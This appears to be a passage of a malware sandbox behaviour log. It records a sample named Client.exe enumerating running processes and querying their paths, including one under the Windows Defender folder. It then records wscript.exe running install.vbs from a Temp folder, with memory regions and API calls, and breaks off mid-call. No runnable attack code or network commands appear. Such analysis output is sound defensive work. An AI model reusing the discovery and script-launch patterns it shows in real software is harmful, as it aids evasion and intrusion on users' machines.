[0293.643] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="have return physical.exe")) returned 1 [0293.644] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or level.exe")) returned 1 [0293.644] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="court camera.exe")) returned 1 [0293.646] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x390) returned 0x178 [0293.646] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x902a50, nSize=0x104 | out: lpFilename="") returned 0x0 [0293.647] CloseHandle (hObject=0x178) returned 1 [0293.647] CloseHandle (hObject=0x170) returned 1 [0293.647] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0293.647] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\explorer.exe", lpdwSize=0x18faf0) returned 1 [0293.649] CloseHandle (hObject=0x170) returned 1 [0293.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0293.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0293.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x9d92a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\explorer.exe.exee", lpUsedDefaultChar=0x0) returned 23 [0293.649] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x958) returned 0x170 [0293.649] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\Windows Portable Devices\\court camera.exe", lpdwSize=0x18fd48) returned 1 [0293.652] CloseHandle (hObject=0x170) returned 1 [0293.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Windows Portable Devices\\court camera.exe", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0293.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Windows Portable Devices\\court camera.exe", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0293.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Windows Portable Devices\\court camera.exe", cchWideChar=64, lpMultiByteStr=0xa12048, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Windows Portable Devices\\court camera.exe", lpUsedDefaultChar=0x0) returned 64 [0293.652] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x958) returned 0x170 [0293.652] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Program Files (x86)\\Windows Portable Devices\\court camera.exe", lpdwSize=0x18fd40) returned 1 [0293.655] CloseHandle (hObject=0x170) returned 1 [0293.655] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x958) returned 0x170 [0293.655] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\Windows Portable Devices\\court camera.exe", lpdwSize=0x18fd48) returned 1 [0293.658] CloseHandle (hObject=0x170) returned 1 [0293.658] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x958) returned 0x170 [0293.658] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Program Files (x86)\\Windows Portable Devices\\court camera.exe", lpdwSize=0x18fd48) returned 1 [0293.661] CloseHandle (hObject=0x170) returned 1 [0293.662] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0293.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x960) returned 0x170 [0293.662] GetPriorityClass (hProcess=0x170) returned 0x20 [0293.662] CloseHandle (hObject=0x170) returned 1 [0293.662] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x960) returned 0x170 [0293.662] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Program Files\\Windows Defender\\or-finger.exe", lpdwSize=0x18fd44) returned 1 [0293.665] CloseHandle (hObject=0x170) returned 1 [0293.665] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0293.670] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.671] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0293.672] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0293.672] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.673] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0293.674] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0293.675] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0293.676] Process32NextW (hSnapshot=0x170, lppe=0x18fb14) Thread: id = 474 os_tid = 0xd64 Thread: id = 475 os_tid = 0xd60 Process: id = "51" image_name = "wscript.exe" filename = "c:\\windows\\syswow64\\wscript.exe" page_root = "0x6bcea000" os_pid = "0xd6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0xb7c" cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\install.vbs\" " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8493 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8494 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8495 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8496 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 8497 start_va = 0x1b0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 8498 start_va = 0x200000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8499 start_va = 0x7e0000 end_va = 0x805fff monitored = 1 entry_point = 0x7e2f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 8500 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8501 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8502 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 8503 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 8504 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 8505 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 8506 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8507 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8508 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8640 start_va = 0xc0000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 8641 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8642 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8643 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8644 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8645 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8646 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8647 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 8648 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8649 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 8650 start_va = 0x300000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 8651 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8652 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8691 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8692 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8693 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8694 start_va = 0x140000 end_va = 0x1a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8695 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8696 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8697 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8698 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8699 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8700 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8701 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 8702 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 8703 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 8704 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 8705 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 8706 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 8707 start_va = 0x74520000 end_va = 0x74528fff monitored = 0 entry_point = 0x74521220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 8708 start_va = 0x60000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 8735 start_va = 0x460000 end_va = 0x5e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 8736 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8737 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8738 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 8739 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 8740 start_va = 0x5f0000 end_va = 0x770fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 8741 start_va = 0x810000 end_va = 0x1c0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 8742 start_va = 0x20000 end_va = 0x22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscript.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wscript.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wscript.exe.mui") Region: id = 8820 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8821 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 8822 start_va = 0x80000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 8823 start_va = 0x74430000 end_va = 0x744affff monitored = 0 entry_point = 0x744437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 8824 start_va = 0x1c10000 end_va = 0x1d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 8859 start_va = 0x1d10000 end_va = 0x1deefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d10000" filename = "" Region: id = 8931 start_va = 0x1ee0000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 8932 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 8933 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 8934 start_va = 0x2100000 end_va = 0x23cefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8935 start_va = 0x70000 end_va = 0x7efff monitored = 1 entry_point = 0x72f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 8936 start_va = 0x72e00000 end_va = 0x72e5efff monitored = 0 entry_point = 0x72e02134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 8995 start_va = 0x1e00000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 8996 start_va = 0x2490000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 8997 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 8998 start_va = 0x743c0000 end_va = 0x743d2fff monitored = 0 entry_point = 0x743c1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 8999 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 9000 start_va = 0x77320000 end_va = 0x773a2fff monitored = 0 entry_point = 0x773223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 9001 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 9002 start_va = 0x72b60000 end_va = 0x72bcafff monitored = 1 entry_point = 0x72b61409 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll") Region: id = 9043 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "install.vbs" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\install.vbs" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\install.vbs") Region: id = 9074 start_va = 0x76b60000 end_va = 0x76b8efff monitored = 0 entry_point = 0x76b62a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Thread: id = 480 os_tid = 0xd70 [0292.439] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffb60 | out: lpSystemTimeAsFileTime=0x2ffb60*(dwLowDateTime=0xd207bdc0, dwHighDateTime=0x1d7fb6e)) [0292.439] GetCurrentProcessId () returned 0xd6c [0292.439] GetCurrentThreadId () returned 0xd70 [0292.439] GetTickCount () returned 0x1d64c12 [0292.439] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffb58 | out: lpPerformanceCount=0x2ffb58*=3101864530044) returned 1 [0292.440] GetStartupInfoA (in: lpStartupInfo=0x2ffb74 | out: lpStartupInfo=0x2ffb74*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0292.441] GetModuleHandleA (lpModuleName=0x0) returned 0x7e0000 [0292.441] GetModuleHandleA (lpModuleName=0x0) returned 0x7e0000 [0292.441] GetVersionExA (in: lpVersionInformation=0x2ffa84*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1000000, dwMinorVersion=0x2ff9d4, dwBuildNumber=0x0, dwPlatformId=0x2ffbf4, szCSDVersion="Í\x1e¥w>×Ø\x01þÿÿÿ£<¡wÎ<¡wD") | out: lpVersionInformation=0x2ffa84*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0292.441] GetUserDefaultLCID () returned 0x409 [0292.443] CoInitialize (pvReserved=0x0) returned 0x0 [0292.578] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\install.vbs\" " [0292.578] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\install.vbs\" ") returned 85 [0292.578] ??2@YAPAXI@Z () returned 0x812b0 [0292.578] ??2@YAPAXI@Z () returned 0x81368 [0292.578] GetCurrentThreadId () returned 0xd70 [0292.578] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff894 | out: phkResult=0x2ff894*=0xa0) returned 0x0 [0292.579] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff898 | out: phkResult=0x2ff898*=0xa4) returned 0x0 [0292.579] RegQueryValueExW (in: hKey=0xa4, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2fec48, lpData=0x2fec4c, lpcbData=0x2fec44*=0x400 | out: lpType=0x2fec48*=0x0, lpData=0x2fec4c*=0x0, lpcbData=0x2fec44*=0x400) returned 0x2 [0292.579] RegQueryValueExW (in: hKey=0xa0, lpValueName="Enabled", lpReserved=0x0, lpType=0x2fec48, lpData=0x2fec4c, lpcbData=0x2fec44*=0x400 | out: lpType=0x2fec48*=0x0, lpData=0x2fec4c*=0x0, lpcbData=0x2fec44*=0x400) returned 0x2 [0292.580] RegQueryValueExW (in: hKey=0xa4, lpValueName="Enabled", lpReserved=0x0, lpType=0x2fec48, lpData=0x2fec4c, lpcbData=0x2fec44*=0x400 | out: lpType=0x2fec48*=0x0, lpData=0x2fec4c*=0x0, lpcbData=0x2fec44*=0x400) returned 0x2 [0292.580] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, 